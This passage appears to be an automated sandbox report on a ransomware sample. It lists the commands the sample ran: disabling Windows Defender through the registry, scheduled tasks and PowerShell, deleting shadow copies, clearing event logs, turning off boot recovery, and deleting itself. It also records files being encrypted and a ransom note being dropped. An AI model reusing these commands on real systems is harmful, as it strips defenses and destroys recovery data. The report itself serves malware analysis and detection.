| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1756-53-0x0000000000000000-mapping.dmp
memory/524-54-0x0000000000000000-mapping.dmp
memory/664-55-0x0000000000000000-mapping.dmp
memory/760-56-0x0000000000000000-mapping.dmp
memory/860-57-0x0000000000000000-mapping.dmp
memory/800-58-0x0000000000000000-mapping.dmp
memory/1464-59-0x0000000000000000-mapping.dmp
memory/1680-60-0x0000000000000000-mapping.dmp
memory/864-61-0x0000000000000000-mapping.dmp
memory/628-62-0x0000000000000000-mapping.dmp
memory/1768-63-0x0000000000000000-mapping.dmp
memory/396-64-0x0000000000000000-mapping.dmp
memory/1108-65-0x0000000000000000-mapping.dmp
memory/1100-66-0x0000000000000000-mapping.dmp
memory/1056-67-0x0000000000000000-mapping.dmp
memory/1808-68-0x0000000000000000-mapping.dmp
memory/1360-69-0x0000000000000000-mapping.dmp
memory/1608-70-0x0000000000000000-mapping.dmp
memory/1276-71-0x0000000000000000-mapping.dmp
memory/1028-72-0x0000000000000000-mapping.dmp
memory/1784-73-0x0000000000000000-mapping.dmp
memory/832-74-0x0000000000000000-mapping.dmp
memory/1772-75-0x0000000000000000-mapping.dmp
memory/1908-76-0x0000000000000000-mapping.dmp
memory/928-77-0x0000000000000000-mapping.dmp
memory/1588-78-0x0000000000000000-mapping.dmp
memory/852-79-0x0000000000000000-mapping.dmp
memory/1732-80-0x0000000000000000-mapping.dmp
memory/1192-81-0x0000000000000000-mapping.dmp
memory/472-82-0x0000000000000000-mapping.dmp
memory/768-83-0x0000000000000000-mapping.dmp
memory/1496-84-0x0000000000000000-mapping.dmp
memory/1680-85-0x0000000000000000-mapping.dmp
memory/748-86-0x0000000000000000-mapping.dmp
memory/984-87-0x0000000000000000-mapping.dmp
memory/1120-88-0x0000000000000000-mapping.dmp
memory/1180-89-0x0000000000000000-mapping.dmp
memory/1996-90-0x0000000000000000-mapping.dmp
memory/1196-91-0x0000000000000000-mapping.dmp
memory/1204-92-0x0000000000000000-mapping.dmp
memory/1724-93-0x0000000000000000-mapping.dmp
memory/556-94-0x0000000000000000-mapping.dmp
memory/1964-95-0x0000000000000000-mapping.dmp
memory/680-96-0x0000000000000000-mapping.dmp
memory/2008-97-0x0000000000000000-mapping.dmp
memory/1272-98-0x0000000000000000-mapping.dmp
memory/524-99-0x0000000000000000-mapping.dmp
memory/1628-100-0x0000000000000000-mapping.dmp
memory/1688-101-0x0000000000000000-mapping.dmp
memory/676-102-0x0000000000000000-mapping.dmp
memory/1212-103-0x0000000000000000-mapping.dmp
memory/2012-104-0x0000000000000000-mapping.dmp
memory/904-105-0x0000000000000000-mapping.dmp
memory/1708-106-0x0000000000000000-mapping.dmp
memory/1596-107-0x0000000000000000-mapping.dmp
memory/1116-108-0x0000000000000000-mapping.dmp
memory/1676-109-0x0000000000000000-mapping.dmp
memory/1712-110-0x0000000000000000-mapping.dmp
memory/272-111-0x0000000000000000-mapping.dmp
memory/272-112-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
memory/1592-113-0x0000000000000000-mapping.dmp
memory/1632-115-0x0000000000000000-mapping.dmp
memory/1480-117-0x0000000000000000-mapping.dmp
memory/588-118-0x0000000000000000-mapping.dmp
memory/1096-119-0x0000000000000000-mapping.dmp
memory/2080-121-0x000007FEF38E0000-0x000007FEF443D000-memory.dmp
memory/2080-123-0x0000000002860000-0x0000000002862000-memory.dmp
memory/2080-124-0x0000000002862000-0x0000000002864000-memory.dmp
memory/2080-125-0x000000000286B000-0x000000000288A000-memory.dmp
memory/2080-122-0x000000001B710000-0x000000001BA0F000-memory.dmp
memory/2080-126-0x0000000002864000-0x0000000002867000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a208b721a482c583e8aec4a58ffafba8 |
| SHA1 | fe96cf43bdaae291dac88081333f65a01a224254 |
| SHA256 | 7f65f66220e8b56c91d69e2c1b2510d80b5ee84da47e0119f75e224d3eef2796 |
| SHA512 | 129b3dc4d9f91a1b3c5bcee1e2bf1ae35f57afab05f1019e6aebd8b080c6a93e3f41121de526e6d801bffb3fdc527a0c01f8366ce30b26471c54c6fc5c268475 |
memory/2172-129-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
memory/2172-130-0x000000001B780000-0x000000001BA7F000-memory.dmp
memory/2172-133-0x0000000001FC4000-0x0000000001FC7000-memory.dmp
memory/2172-134-0x0000000001FCB000-0x0000000001FEA000-memory.dmp
memory/2172-131-0x0000000001FC0000-0x0000000001FC2000-memory.dmp
memory/2172-132-0x0000000001FC2000-0x0000000001FC4000-memory.dmp
C:\rFSH_HOW_TO_DECRYPT.txt
| MD5 | 9feb836dd50f68cbf9e87dad21a2fbc4 |
| SHA1 | f995609d7ea8a22383c8f28e2ac9b657fa767019 |
| SHA256 | 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e |
| SHA512 | 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 14:09
Reported
2022-01-12 14:14
Platform
win10-en-20211208
Max time kernel
156s
Max time network
179s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareFind.crw => C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StepRestart.raw => C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupUnpublish.raw => C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PopStart.png => C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectUnlock.tif => C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UninstallEnable.png => C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\SPRING.INF.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-focus_32.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_PAAAADwAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_KgAAACoAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GAAAABgAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6449_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-pl.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\182.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo2.targetsize-36.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1c.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-150.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ul-oob.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\assets_picker-account-addPerson-48.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-125.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
